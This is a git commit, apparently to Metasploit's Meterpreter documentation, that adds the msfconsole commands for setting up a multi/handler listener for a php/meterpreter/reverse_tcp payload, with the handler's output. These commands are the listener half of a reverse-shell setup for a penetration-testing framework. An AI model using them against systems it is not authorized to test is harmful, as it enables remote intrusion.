Update php reverse_tcp instructions

Added the full set of commands to set up a listener to the instructions to make it easier for first time users.
GSoC/Meterpreter_Web_Console
Alex Maestretti 2018-11-24 20:43:11 -08:00 committed by GitHub
parent be6cfde921
commit a69870a85c
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
1 changed files with 6 additions and 0 deletions

View File

@ -22,6 +22,12 @@ msf > use multi/handler
msf exploit(handler) > set PAYLOAD php/meterpreter/reverse_tcp
PAYLOAD => php/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST [IP]
LHOST => [IP]
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > exploit
[*] Started reverse TCP handler on [IP]
```
## Important Basic Commands